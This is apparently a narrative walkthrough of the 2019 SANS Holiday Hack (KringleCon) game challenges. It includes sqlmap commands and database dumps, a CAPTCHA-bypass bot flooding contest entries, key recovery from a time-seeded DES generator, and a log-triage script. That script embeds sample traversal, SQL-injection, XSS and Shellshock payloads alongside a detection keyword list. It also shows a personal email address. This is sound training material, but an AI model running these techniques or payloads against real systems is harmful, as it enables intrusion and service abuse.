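The weakness the walkthrough exploits is that the game's integrity hash is an unkeyed MD5 computed from values the client already knows, so anyone who edits the form can recompute it.  The added example below (my own code, not the game's) contrasts that scheme with a keyed HMAC over the full state; the state fields, the sum-based total and SERVER_SECRET are constructed for the demonstration.

```python
import hashlib
import hmac
import json

# Constructed stand-ins: the real game's field set and any secret are not known here.
SERVER_SECRET = b"demo-secret-held-only-by-the-server"
START_STATE = {"distance": 0, "food": 100, "money": 1500, "day": 1}


def state_total(state):
    """Mimic the observed scheme: the hash went from MD5 of 1626 to MD5 of
    1626 + 7999 once distance was edited, i.e. a hash over a running sum."""
    return sum(state.values())


def unkeyed_tag(state):
    """The game-style tag: MD5 of the total, no secret involved."""
    return hashlib.md5(str(state_total(state)).encode()).hexdigest()


def verify_unkeyed(state, tag):
    return hmac.compare_digest(unkeyed_tag(state), tag)


def canonical(state):
    """Stable byte encoding of the whole state so every field is covered."""
    return json.dumps(state, sort_keys=True, separators=(",", ":")).encode()


def keyed_tag(state, secret=SERVER_SECRET):
    """Server-issued tag: HMAC-SHA256 over the canonical state."""
    return hmac.new(secret, canonical(state), hashlib.sha256).hexdigest()


def verify_keyed(state, tag, secret=SERVER_SECRET):
    return hmac.compare_digest(keyed_tag(state, secret), tag)


def client_edit(state, **changes):
    """What the dev-tools edit amounted to: change fields, then recompute the
    unkeyed hash from the new values.  No secret is needed, so it verifies."""
    edited = {**state, **changes}
    return edited, unkeyed_tag(edited)


if __name__ == "__main__":
    honest_tag = keyed_tag(START_STATE)
    edited, forged = client_edit(START_STATE, distance=7999)
    print("unkeyed MD5: server accepts edited state?", verify_unkeyed(edited, forged))
    print("keyed HMAC : server accepts edited state?", verify_keyed(edited, honest_tag))
```

Even the keyed variant only proves the server issued the tag for that exact state and does not stop replaying an old, valid state; the durable fix is to keep the authoritative game state server-side so the client never submits it at all.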


       As I hand the terminal back to Minty, still beaming at my success even though I cheated, “You made it - congrats! Have you played with the key grinder in my room? Check it out! It turns out: if you have a good image of a key, you can physically copy it. Maybe you’ll see someone hopping around with a key here on campus. Sometimes you can find it in the Network tab of the browser console. Deviant has a great talk on it at this year’s Con [34]. He even has a collection of key bitting templates for common vendors like Kwikset, Schlage, and Yale [46].”  I guess that’s an invitation to play with the key grinder in Minty’s room. 


Minty’s Dorm Room


       As I first step into Minty’s dorm room, I see a gentleman that’s not quite an elf, but not quite human either hop into, of all places, the closet.  Ok, as if that’s not weird enough, I notice he has a key latched to his belt.  Remembering Minty’s earlier comment, I quickly grab a picture of the key and begin “inspecting the Elements” of that picture.  For those of you following along at home, Inspect Element is a neat little developer trick that you can use on Lazlo before he ducks into the closet to grab his picture URL located at https://kringlecon.com/images/avatars/elves/krampus.png Oh and spoiler alert, Lazlo is Krampus. Sorry, had a bit of a 4th wall break moment there. So, once I had a picture of the key, I have to duplicate it.  Using the techniques from Deviant’s talk [34] and the templates provided in Minty’s hint [46], I was quickly able to deduce that we were dealing with a Schlage lock and key.  Easy part down, hard part to go.  Using the Schlage Template, and a lot of image manipulation in GIMP, I was finally able to get an overlay image and begin trying to play around with the measurements. 

       To say the least, this was not an easy task.  It took a lot of math and playing with aspect ratios to get the image of the key closer to the actual key dimensions and the template to match the actual key sizes.  After many hours of blood, sweat, tears, many packs of cigarettes, much alcohol, and several creative swear words that would make a sailor blush, I finally got the bitting code down to 122520 and tried it on the odd lock that was in Minty’s closet.  Success!  As I moved forward into the creepy door in the closet that just said, “This is it”, I wondered to myself if this was such a good idea.  I guess I would find out. I step through the door at the back of the closet and into the Steam Tunnels.  “Well, at least I know why Lazlo/Krampus came into the closet” I thought.  All of my trepidation seemed to be for naught as I rounded the corner and came face to face with Krampus himself. 


       “Hello there! I’m Krampus Hollyfeld. I maintain the steam tunnels underneath Elf U, Keeping all the elves warm and jolly. Though I spend my time in the tunnels and smoke, In this whole wide world, there’s no happier bloke! Yes, I borrowed Santa’s turtle doves for just a bit. Someone left some scraps of paper near that fireplace, which is a big fire hazard. I sent the turtle doves to fetch the paper scraps. But, before I can tell you more, I need to know that I can trust you. Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I’ll know I can trust you. The contest is here on my screen and at fridosleigh.com [47]. No purchase necessary, enter as often as you want, so I am! They set up the rules, and lately, I have come to realize that I have certain materialistic, cookie needs. Unfortunately, it’s restricted to elves only, and I can’t bypass the CAPTEHA. (That’s Completely Automated Public Turing test to tell Elves and Humans Apart.) I’ve already cataloged 12,000 images [48] and decoded the API interface [49]. Can you help me bypass the CAPTEHA and submit lots of entries?”  I now know Krampus’ full name - Krampus Hollyfeld.  I enter that into the KringleCon console and voila! 


Achievement Unlocked: Get Access to the Steam Tunnels – You have completed the Get Access to the Steam Tunnels challenge!

Chapter 9:  Bypassing the Frido Sleigh CAPTEHA

       “Help Krampus beat the Frido Sleigh contest. For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.”  Krampus was not at all what I had expected.  He seems more forlorn to not be included in the contest than angry.  Perhaps he’s not the one causing the problems.  I’m going to help him with the contest and see where it leads.  My hardware and Internet connection are old and terrible and machine learning needs some pretty beefy specifications.  So, I turned to FloydHub.com [50].  I uploaded the TensorFlow trainer from Chris Davis’ talk [27] that he posted on GitHub for us [51] along with the image library [48].  I set a CPU workspace to work in FloydHub training while I worked on incorporating processing into the API wrapper.  What I ended up with were two separate Python scripts, one calling the other.  The first was the API Wrapper from Krampus [C1] and the second is the classifier.py that is imported as Classifier into the wrapper [C2].


       By this point the workspace had finished training its TensorFlow model.  So, I made sure that the output of the training, output_graph.pb and output_labels.txt, were in the correct location as they would be the input dataset for this new script.  So, the new dataset is named outtoin, as in output to input. Once I am sure that the dataset is in the right place, I change the workspace over to a GPU model for faster processing and execute the captcha_api.py script.  After a few false starts:

Starting ML Capteha breaker
TensorFlow engine ready
Getting capteha images
We need Christmas Trees, Ornaments or Presents:
Calculating image types
Waiting For classification to Finish...
d197df91-e587-11e9-97c1-309c23aaf0ac is a Christmas Trees
5dcfe371-e587-11e9-97c1-309c23aaf0ac is a Presents
a438ad60-e586-11e9-97c1-309c23aaf0ac is a Presents
---------------shortened for brevity------------------------------
Sending d197df91-e587-11e9-97c1-309c23aaf0ac,5dcfe371-e587-11e9-97c1-309c23aaf0ac,a438ad60-e586-11e9-97c1-309c23aaf0ac,
eef9fffb-e587-11e9-97c1-309c23aaf0ac,b60711cd-e586-11e9-97c1-309c23aaf0ac,16e12f27-e587-11e9-
97c1-309c23aaf0ac,2659eaae-e586-11e9-97c1-309c23aaf0ac,9ae29dd8-
---------------shortened for brevity------------------------------
FAILED MACHINE LEARNING GUESS
--------------------
Our ML Guess:
--------------------
d197df91-e587-11e9-97c1-309c23aaf0ac,5dcfe371-e587-11e9-97c1-309c23aaf0ac,a438ad60-e586-11e9-97c1-309c23aaf0ac,
eef9fffb-e587-11e9-97c1-309c23aaf0ac,b6
---------------shortened for brevity------------------------------
--------------------
Server Response:
--------------------
Timed Out!
Getting capteha images
We need Stockings, Candy Canes or Ornaments:
Calculating image types
Waiting For classification to Finish...
05441a98-e585-11e9-97c1-309c23aaf0ac is a Ornaments
---------------shortened for brevity------------------------------
Sending 05441a98-e585-11e9-97c1-309c23aaf0ac,3d128423-e585-11e9-97c1-309c23aaf0ac,e55ac481-e585-11e9-97c1-309c23aaf0ac,
1a6a470a-e586-11e9-97c1-309c23aaf0ac,b8f33295
---------------shortened for brevity------------------------------
CAPTEHA Solved!
Submitting lots of entries until we win the contest! Entry #1
Submitting lots of entries until we win the contest! Entry #2
Submitting lots of entries until we win the contest! Entry #3
Submitting lots of entries until we win the contest! Entry #4
---------------shortened for brevity------------------------------
Submitting lots of entries until we win the contest! Entry #110
Submitting lots of entries until we win the contest! Entry #111

{"data":" id=\"result_header\"> Entries for email address cruggieri@hotmail.com no longer accepted as our systems show your email was
already randomly selected as a winner! Go check your email to get your winning code. Please allow up to 3-5 minutes for the email to 
arrive in your inbox or check your spam filter settings. 

Congratulations and Happy Holidays!","request":true}

       A few minutes later and I receive the Congratulations email, but the code does not appear to be in the email.  So, I look at the Source of the email and sure enough, buried in the div class of the button is the verification code that I need: 8Ia8LiZEwvyZr2WO.  Entering that code into the KringleCon console grants me a success message and

 

Achievement Unlocked: Bypassing the Frido Sleigh CAPTEHA – You have completed the Bypassing the Frido Sleigh CAPTEHA challenge!

       Turning back to Krampus, happy to have helped, I tell him, “Hey, you won!”  Gleefully he replies, “You did it! Thank you so much. I can trust you! To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels. As for those scraps of paper, I scanned those and put the images on my server. I then threw the paper away. Unfortunately, I managed to lock out my account on the server. Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans? I give you permission to hack into it, solving Objective 9 in your badge. And, as long as you’re traveling around, be sure to solve any other challenges you happen across.”

 

Achievement Unlocked: Teleportation via Steam Tunnels - Whee! You can now use the steam tunnels to move quickly around Elf U! 

 

       Neat!  Now I can zip around campus using the Steam Tunnels.  That’s much more efficient!  “Thanks, Krampus!” I reply, but Krampus’ attention has moved on to something else, and so must mine.  Time to see what these scraps of paper are all about.

Chapter 10:  Retrieve Scraps of Paper from Server

       “Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there [52]. What is the name of Santa's cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.”  For this, I need to see how the server is handling requests.  So, I fire up Burp Suite Community, set my browser to use Burp as a proxy so that I may capture requests, and navigate to studentportal.elfu.org.  Just for giggles, I put my real email address in, submit it and allow the request to complete.  It looks as though there is an anti-Cross-Site Request Forgery token in play at https://studentportal.elfu.org/validator.php.  OK. I can handle that with a macro inside of Burp.  Setting the macro to validator.php with a regex value of (.*?)$ will select everything in the response; ticking the Exclude HTTP Headers checkbox then leaves only the token itself.

              

       From there, set the Session Handling to ensure the Proxy is included to run the macro, all URLs are included, but that the macro is restricted to only the token parameter.  Once the macro is set, I can test by sending a request to https://studentportal.elfu.org/application-check.php?elfmail=1&token= and the macro should still pull the token and show the application as “still processing.”

Next, I run sqlmap -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=" --level=4 --risk=3 --dbms "MySQL" --proxy="http://127.0.0.1:8080/" and eventually find 3 tables.

 

Database: elfu
[3 tables]
+--------------+
| applications |
| krampus      |
| students     |
+--------------+

Done

 

Now, since the scraps are Krampus’, let’s look in the krampus table using sqlmap -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=" -D elfu --dump -T krampus -C path --proxy="http://127.0.0.1:8080/" and I get 6 responses.

 

Database: elfu
Table: krampus
[6 entries]
+-----------------------+
| path                  |
+-----------------------+
| /krampus/0f5f510e.png |
| /krampus/1cc7e121.png |
| /krampus/439f15e6.png |
| /krampus/667d6896.png |
| /krampus/adb798ca.png |
| /krampus/ba417715.png |
+-----------------------+

Done

 

https://studentportal.elfu.org/krampus/0f5f510e.png

https://studentportal.elfu.org/krampus/1cc7e121.png

https://studentportal.elfu.org/krampus/439f15e6.png

https://studentportal.elfu.org/krampus/667d6896.png

https://studentportal.elfu.org/krampus/adb798ca.png

https://studentportal.elfu.org/krampus/ba417715.png

       We have retrieved the scraps of paper and reassembled the letter!  Diverting Santa’s sled on Christmas?!?!  The cutting-edge sleigh guidance technology is called the Super Sled-o-Matic.  I enter that into the KringleCon console and another Objective is completed! 

 

Achievement Unlocked: Retrieve Scraps of Paper from Server – You have completed the Retrieve Scraps of Paper from Server challenge!  

 

       The Tooth background is giving me pause.  Could that be a clue?  I turn back to Krampus eager to share what I’ve learned. “Krampus, someone is going to try and destroy Christmas by hijacking the guidance system on Santa’s Sleigh!  We have to find out who and stop them!” Krampus replies, “Wow! We’ve uncovered quite a nasty plot to destroy the holiday season. We’ve gotta stop whomever is behind it! I managed to find this protected document on one of the compromised machines in our environment. I think our attacker was in the process of exfiltrating it. I’m convinced that it is somehow associated with the plan to destroy the holidays. Can you decrypt it? There are some smart people in the NetWars challenge room who may be able to help us.”  Solemnly I reply, “I can only try, Krampus. I can only try.”

Chapter 11:  Recover Cleartext Document

       “The Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can’t send you the source, but we do have debug symbols that you can use. Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC. What is the middle line on the cover page? (Hint: it’s five words) For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.”  I remember Holly Evergreen talking about Mr. Bowes breathing opcodes [23].  Let’s see if I can put his knowledge to good use.  I pull elfscrow.exe up in Ghidra and run its auto-analyzer.  Once that completes, I open the Defined Strings window and, looking through, I see several Crypt items, one of which, at 00404aa8, tells me that this is a DES-CBC function.  Loading the debug symbols in elfscrow.pdb and doing the same shows me ?super_secure_random.  Now, if I search inside elfscrow.exe for the super string, I find this function:

       The two key numbers there are 0x343fd and 0x269ec3, which converted to decimal are 214013 and 2531011 respectively.  Encrypting dummy files, I can quickly see that the seed is the Epoch conversion of the encryption timestamp.  The objective tells us that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.  Using the Epoch converter [53], we get a range between 1575658800 and 1575666000.  Using information from Mr. Bowes’ talk [23], I was able to recreate a decryption script using PyPDF2 in Python 3 to determine the key value = b5ad6a321240fbec [C3]
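To make the weakness concrete, here is an added Python 3 example (my own code, not the writeup’s C3 script) that reimplements the key generator from the two facts above and recovers the key by trying every seed in the two-hour window. It assumes, as the disassembly shows, that super_secure_random is the Microsoft CRT rand() linear congruential generator (multiplier 0x343fd, increment 0x269ec3, 32-bit state, output = (state >> 16) & 0x7fff), that the state is seeded with the Unix timestamp, and that each of the 8 DES key bytes is the low byte of one generator output; the function names are mine. The DES-CBC step itself is left out since it needs a third-party cipher library.

```python
"""Recover the Elfscrow DES key from its time-seeded generator (added example)."""
from datetime import datetime, timezone

# Constants pulled from the disassembly: the Microsoft CRT rand() LCG.
MULTIPLIER = 0x343FD    # 214013
INCREMENT = 0x269EC3    # 2531011
MASK32 = 0xFFFFFFFF


def window_bounds() -> tuple:
    """Epoch bounds for 2019-12-06 19:00 to 21:00 UTC, the window the objective gives."""
    start = datetime(2019, 12, 6, 19, 0, tzinfo=timezone.utc)
    end = datetime(2019, 12, 6, 21, 0, tzinfo=timezone.utc)
    return int(start.timestamp()), int(end.timestamp())


class SuperSecureRandom:
    """Reimplementation of super_secure_random: 32-bit LCG, top 15 bits output."""

    def __init__(self, seed: int) -> None:
        # Elfscrow seeds the state directly with time(), so the whole key
        # depends on one 32-bit value an attacker can bound from metadata.
        self.state = seed & MASK32

    def next(self) -> int:
        self.state = (self.state * MULTIPLIER + INCREMENT) & MASK32
        return (self.state >> 16) & 0x7FFF


def key_from_seed(seed: int) -> bytes:
    """Build the 8-byte DES key: each byte is the low byte of one rand() output.

    The effective key space is therefore the seed space, not 2^56.
    """
    rng = SuperSecureRandom(seed)
    return bytes(rng.next() & 0xFF for _ in range(8))


def find_seed(target_key_hex: str, start: int, end: int):
    """Return the seed in [start, end] whose derived key equals target_key_hex, else None."""
    target = bytes.fromhex(target_key_hex)
    for seed in range(start, end + 1):
        if key_from_seed(seed) == target:
            return seed
    return None


if __name__ == "__main__":
    start, end = window_bounds()
    print(f"window {start}..{end}: only {end - start + 1} candidate keys")
    # Key value recovered in the writeup; a real search would instead test
    # each candidate key by decrypting and checking for a %PDF header.
    seed = find_seed("b5ad6a321240fbec", start, end)
    print("seed:", seed, "->", datetime.fromtimestamp(seed, timezone.utc).isoformat())
```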

 

       After a few brief moments, the file decrypts to Keyvalue.pdf, which appears to be the Quick Start Guide for the Super Sled-O-Matic’s Machine Learning Sleigh Route Finder.  In fact, Machine Learning Sleigh Route Finder is the challenge code for the KringleCon console!

 

Achievement Unlocked: Recover Cleartext Document - Congratulations! You have completed the Recover Cleartext Document challenge! 

 

       Well, it looks like it is time to go see an elf about …… a crate?

Chapter 12:  Open the Sleigh Shop Door

       “Visit Shinny Upatree in the Student Union and help solve their problem. What is written on the paper you retrieve for Shinny? For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.”  “I can honestly say this has been the strangest Christmas vacation that I’ve had in quite some time,” I think as I walk back into the Student Union, “never a dull moment.”   I march up to the elf that has been guarding the Sleigh Shop Door and before I can even open my mouth: “Psst - hey! I’m Shinny Upatree, and I know what’s going on! Yeah, that’s right - guarding the sleigh shop has made me privy to some serious, high-level intel. In fact, I know WHO is causing all the trouble. Cindy? Oh no no, not that who. And stop guessing - you’ll never figure it out. The only way you could would be if you could break into my crate, here [54]. You see, I’ve written the villain’s name down on a piece of paper and hidden it away securely!” Let’s have a look at this crate then.

Seriously!?! 10 locks with 10 little riddles.  Fortunately, I have just topped off my coffee.  Let’s have at these riddles then.  They change after every refresh, so while I will put the codes and how to get them, just know that they will be different every time.   I recommend Chrome for this part.

 

Riddle 1:  You don't need a clever riddle to open the console and scroll a little.

 

Answer:  Open Chrome Dev Tools and go to the Console Tab.  Scroll up and find your first code.

Riddle 2:  Some codes are hard to spy, perhaps they'll show up on pulp with dye?

 

Answer:  Paper is made with pulp.  Go to Print and the Print Preview window will have the code.

Riddle 3:  This code is still unknown; it was fetched but never shown.

 

Answer:  In the Dev Tools Network tab, you will see several GET requests for a PNG file.  The code is in the image.

Riddle 4:  Where might we keep the things we forage? Yes, of course: Local barrels!

 

Answer: The Storage Tab of Dev Tools will have the code.

Riddle 5:  Did you notice the code in the title? It may very well prove vital.

 

Answer:  The code is in the Title element of the page’s header.

Riddle 6:  In order for this hologram to be effective, it may be necessary to increase your perspective.

 

Answer:  Inspect Element on the hologram and increase the perspective value.

Riddle 7:  The font you're seeing is pretty slick, but this lock's code was my first pick.

 

Answer:  Inside the Elements or Inspector tab of Dev Tools search for font-family.

Riddle 8:  In the event that the .eggs go bad, you must figure out who will be sad.

 

Answer:  Two things.  First, this answer never changes. Second, this was admittedly easier to find in the Firefox Dev tools.  If I Inspect the eggs element, I will see that there is an event marker on it.  Clicking the event marker shows a spoil event and shows that Veronica would be sad.

Riddle 9:  This next code will be unredacted, but only when all the chakras are :active.

 

Answer:  This one has an unintended method.  The intended way is to force the :active pseudo-class onto the .chakras to produce the code.  However, if you look through the Sources tab for chakra, you can see the code and the order it should be in.

Riddle 10:  Oh, no! This lock's out of commission! Pop off the cover and locate what's missing.

 

Answer:  The components are all there.  They are just in the wrong order.  Expand the HTML code for div class lock c10.  Move the div class component lines for macaroni, swab and gnome under div lock c10, but before cover.  If I edit the HTML in ANY way in Firefox, it will cause the on-click event to disappear.  So, I must either do this part in Chrome, or drag and drop the components in Firefox. Along the way, looking in the c10 source I found https://crate.elfu.org/images/lock_inside.png, which actually has the code on it.  This code also never changes.  It is always KD29XJ37.

 

<div class="lock c10" data-children-count="1">
    <div class="component macaroni" data-code="A33" data-children-count="0"></div>
    <div class="component swab" data-code="J39" data-children-count="0"></div>
    <div class="component gnome" data-code="XJ0" data-children-count="0"></div>
    <div class="cover">
        <button data-id="10" disabled="disabled" data-children-count="0">Unlock</button>
    </div>
    <input type="text" maxlength="8" data-id="10">
    <button class="switch" data-id="10"></button>
    <span class="led-indicator locked"></span>
    <span class="led-indicator unlocked"></span>
</div>

       The locks are open and we are in the crate!  Wait!  The Tooth Fairy!  The Tooth Fairy has been the one behind this entire scheme to destroy Christmas!  I have to find and warn Santa before it’s too late or at least grab the Tooth Fairy before she can cause any more harm! 

Achievement Unlocked: Open the Sleigh Shop Door - Congratulations! You have completed the Open the Sleigh Workshop Door challenge!

 

       I turn back to Shinny, “I have to stop her!” “Wha - what?? You got into my crate?! Well that's embarrassing...But you know what? Hmm... If you're good enough to crack MY security...Do you think you could bring this all to a grand conclusion?  Please go into the sleigh shop and see if you can finish this off!

Stop the Tooth Fairy from ruining Santa's sleigh route!” Shinny seemed confident in my abilities.  So, I rush into the Sleigh Shop to stop the Tooth Fairy!

Chapter 13:  Filter Out Poisoned Sources of Weather Data

       “Use the data supplied in the Zeek JSON logs [55] to identify the IP addresses of attackers poisoning Santa's flight mapping software. Block the 100 offending sources of information to guide Santa's sleigh through the attack. Submit the Route ID ("RID") success value that you're given [56]. For hints on achieving this objective, please visit the Sleigh Shop and talk with Wunorse Openslae.” As I burst through the Sleigh Shop door, I am met by the surprised stares of the Tooth Fairy, Krampus, and an elf that I haven’t met before. I knew what the Tooth Fairy was doing here, but why was Krampus here?  And this other elf?  Was he friend or foe?  As I hurried over to Krampus, all he would mutter is, “But there’s still time! Solve the final challenge in your badge by blocking the bad IPs at srf.elfu.org and save the holiday season!” over and over.  Let’s see what this new elf wants.  I ask, “You look like you need some help.  What can I do?” The elf replied, “I’m pretty sure one of these connections is a malicious C2 channel… Do you think you could take a look? I hear a lot of C2 channels have very long connection times. Please use jq to find the longest connection in this data set. We have to kick out any and all grinchy activity!”

Challenge 10:  Zeek JSON Analysis

Challenge URL:  https://docker2019.kringlecon.com/?challenge=jq

Challenge Objective:  Identify the destination IP address with the longest connection duration using the supplied Zeek logfile.

Terminal Start:

For this I need to parse conn.log with jq to find the longest-duration connection [57].  I can do that with cat conn.log | jq -s -c 'sort_by(.duration) | reverse [:2]' to show the top 2 longest durations, and we see the IP is 13.107.21.200. 

Enter 13.107.21.200 into runtoanswer and

 

Achievement Unlocked: Zeek JSON Analysis - You have completed the Zeek JSON Analysis challenge!

       So, this new elf is Wunorse Openslae.  As I hand him back his terminal, he exclaims, “That’s got to be the one - thanks! Hey, you know what? We’ve got a crisis here. You see, Santa’s flight route is planned by a complex set of machine learning algorithms which use available weather data. All the weather stations are reporting severe weather to Santa’s Sleigh. I think someone might be forging intentionally false weather data! I’m so flummoxed I can’t even remember how to login! Hmm… Maybe the Zeek http.log could help us. I worry about LFI [58], XSS [59], and SQLi [44] in the Zeek log - oh my! And I’d be shocked if there weren’t some shell stuff in there too [60]. I’ll bet if you pick through, you can find some naughty data from naughty hosts and block it in the firewall. If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs. The sleigh’s machine learning device (SRF) needs most of the malicious IPs blocked in order to calculate a good route. Try not to block many legitimate weather station IPs as that could also cause route calculation failure. Remember, when looking at JSON data, jq is the tool for you!”

              

       I confidently walk up to the Tooth Fairy.  “I’m the Tooth Fairy, the mastermind behind the plot to destroy the holiday season.  I hate how Santa is so beloved, but only works one day per year!  He has all of the resources of the North Pole and the elves to help him too.  I run a solo operation, toiling year-round collecting deciduous bicuspids and more from children.  But I get nowhere near the gratitude that Santa gets. He needs to share his holiday resources with the rest of us!  But, although you found me, you haven’t foiled my plot! Santa’s sleigh will NOT be able to find its way.  I will get my revenge and respect! I want my own holiday, National Tooth Fairy Day, to be the most popular holiday on the calendar!!!” the Tooth Fairy shouts staring angrily.  I know the only thing that I can do is find those poisoned weather IPs and block Santa’s Route Finder from getting their bad information.  I have to save Christmas.

 

       I start by uploading the http log file to Splunk.  After all, Splunk did sponsor this Christmas story.  They should have a hand in stopping the Tooth Fairy’s nefarious plot.  Once uploaded to Splunk, my first search is for the Readme file that the cleartext document from Chapter 11 told me about. Sure enough, there’s the admin password to the API.

 

 

# Sled-O-Matic - Sleigh Route Finder Web API

### Installation

```
sudo apt install python3-pip
sudo python3 -m pip install -r requirements.txt
```

#### Running:

`python3 ./srfweb.py`

#### Logging in:

You can login using the default admin pass:

`admin 924158F9522B3744F5FCD4D10FAC4356`

 

Next, I look for any instance of Local File Inclusion, Cross-Site Scripting, SQL Injection, or Shellshock attempts using this search string:

 

host="srf.elfu.org" passwd OR sh OR cmd OR "*%00*" OR javascript:alert OR ../ OR "1=1" OR rb OR perl OR chmod OR SELECT OR UNION OR cat OR ls OR cd OR WHERE OR bash OR etc OR NULL OR cgi-bin OR python OR wget OR script  

 

       That yielded 597 results.  I am sure a good many of those are false positives, so let’s begin by exporting those to CSV and pulling out the obvious attempts: the ../, the =/etc/passwd, the username ‘ OR 1=1, etc. Doing that, I am able to narrow it down to 88 obvious attacks (D2). From these events, I noticed several unusual User-Agent strings.  So, I searched all events based on those 61 unique User-Agent strings.  That produced 176 events, but I noticed the OBVIOUS attacks all had only two events per string.  That led me to believe that there were some false positives in this list.  So, I pulled out 109 obvious attack events.  There were 95 unique IP addresses in those 109 events. I submitted those 95 IP addresses to DENY and received a successful RID (D3, D4, D5).
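The same two-stage triage (signature hits, then a pivot on the attackers’ User-Agent strings, with common browser strings excluded so weather stations are not swept up) as an added Python 3 example, not the Splunk workflow above. It runs over a handful of constructed Zeek JSON http.log records embedded in the script; the IPs, User-Agents and the max_pivot_count threshold are my own inventions for illustration.

```python
"""Triage Zeek http.log records for LFI/XSS/SQLi/Shellshock and pivot on User-Agent."""
import json
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in the shape of Zeek's JSON http.log (not the real data).
SAMPLE_HTTP_LOG = r"""
{"ts":1575900001.1,"id.orig_h":"10.1.1.10","id.resp_h":"10.20.3.80","method":"GET","host":"srf.elfu.org","uri":"/api/weather?station=NP1","user_agent":"Mozilla/5.0 (Windows NT 10.0; rv:70.0) Gecko/20100101 Firefox/70.0","status_code":200}
{"ts":1575900002.2,"id.orig_h":"10.1.1.11","id.resp_h":"10.20.3.80","method":"GET","host":"srf.elfu.org","uri":"/api/weather?station=NP2","user_agent":"Mozilla/5.0 (Windows NT 10.0; rv:70.0) Gecko/20100101 Firefox/70.0","status_code":200}
{"ts":1575900003.3,"id.orig_h":"10.1.1.12","id.resp_h":"10.20.3.80","method":"GET","host":"srf.elfu.org","uri":"/api/weather?station=NP3","user_agent":"Mozilla/5.0 (Windows NT 10.0; rv:70.0) Gecko/20100101 Firefox/70.0","status_code":200}
{"ts":1575900004.4,"id.orig_h":"203.0.113.7","id.resp_h":"10.20.3.80","method":"GET","host":"srf.elfu.org","uri":"/api/weather?station=../../../../etc/passwd","user_agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","status_code":404}
{"ts":1575900005.5,"id.orig_h":"203.0.113.8","id.resp_h":"10.20.3.80","method":"GET","host":"srf.elfu.org","uri":"/api/weather?station=NP4","user_agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","status_code":200}
{"ts":1575900006.6,"id.orig_h":"198.51.100.5","id.resp_h":"10.20.3.80","method":"POST","host":"srf.elfu.org","uri":"/api/login","username":"admin' OR 1=1 -- ","user_agent":"Mozilla/5.0 (compatible; Konqueror/3.5; Linux)","status_code":200}
{"ts":1575900007.7,"id.orig_h":"198.51.100.9","id.resp_h":"10.20.3.80","method":"GET","host":"srf.elfu.org","uri":"/api/weather?station=%3Cscript%3Ealert(1)%3C/script%3E","user_agent":"Mozilla/5.0 (Windows NT 10.0; rv:70.0) Gecko/20100101 Firefox/70.0","status_code":200}
{"ts":1575900008.8,"id.orig_h":"192.0.2.4","id.resp_h":"10.20.3.80","method":"GET","host":"srf.elfu.org","uri":"/cgi-bin/status","user_agent":"() { :; }; /bin/bash -c 'id'","status_code":500}
{"ts":1575900009.9,"id.orig_h":"10.1.1.13","id.resp_h":"10.20.3.80","method":"GET","host":"srf.elfu.org","uri":"/api/weather?station=NP5","user_agent":"Mozilla/5.0 (Windows NT 10.0; rv:70.0) Gecko/20100101 Firefox/70.0","status_code":200}
"""

# Coarse signatures for the four classes Wunorse worried about, applied to
# URL-decoded field values. The pivot stage widens the net afterwards.
INDICATORS = {
    "lfi": re.compile(r"\.\./|/etc/passwd|\x00", re.I),
    "xss": re.compile(r"<script|javascript:|onerror\s*=", re.I),
    "sqli": re.compile(r"'\s*or\s*1\s*=\s*1|\bunion\b.+\bselect\b|\bselect\b.+\bfrom\b", re.I),
    "shellshock": re.compile(r"\(\)\s*\{\s*:\s*;\s*\}\s*;"),
}
INSPECTED_FIELDS = ("uri", "user_agent", "username", "host", "referrer")


def parse_http_log(text: str) -> list:
    """Parse newline-delimited JSON (one Zeek record per line), skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_indicators(entry: dict) -> list:
    """Return the indicator classes that fire on any inspected field of one record."""
    hits = []
    for field in INSPECTED_FIELDS:
        value = entry.get(field)
        if not isinstance(value, str):
            continue
        decoded = unquote(value)  # payloads are frequently URL-encoded
        for name, pattern in INDICATORS.items():
            if name not in hits and pattern.search(decoded):
                hits.append(name)
    return hits


def triage(entries: list, max_pivot_count=3) -> dict:
    """Stage 1: signature hits. Stage 2: pivot on the flagged requests' User-Agents.

    A User-Agent seen more than max_pivot_count times is treated as a shared,
    legitimate browser string and not pivoted on. Passing None disables the cap,
    which is exactly how legitimate weather stations end up on the block list.
    """
    flagged = [e for e in entries if find_indicators(e)]
    ua_counts = Counter(e.get("user_agent", "") for e in entries)
    pivot_agents = {
        e["user_agent"] for e in flagged
        if e.get("user_agent")
        and (max_pivot_count is None or ua_counts[e["user_agent"]] <= max_pivot_count)
    }
    pivoted = [e for e in entries if e.get("user_agent") in pivot_agents]
    block = {e["id.orig_h"] for e in flagged} | {e["id.orig_h"] for e in pivoted}
    return {"flagged": flagged, "pivot_agents": pivot_agents, "pivoted": pivoted, "block": block}


if __name__ == "__main__":
    records = parse_http_log(SAMPLE_HTTP_LOG)
    result = triage(records)
    for e in result["flagged"]:
        print(e["id.orig_h"], find_indicators(e), e.get("uri"))
    print("pivot agents:", len(result["pivot_agents"]))
    print("block:", sorted(result["block"]))
    print("without the cap:", sorted(triage(records, max_pivot_count=None)["block"]))
```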

Smiling, I turned to the Tooth Fairy.  “Not today. Santa will arrive quite safely.  All your planning and scheming has been fruitless.  You should turn your anger to more productive pursuits” and I enter the RID value into the KringleCon console. 

 

Achievement Unlocked: Filter Out Poisoned Sources of Weather Data - Congratulations! You have completed the Filter Out Poisoned Sources of Weather Data challenge! 

 

I turn around and stride towards the now open Bell Tower door. 

 

 

Bell Tower

              

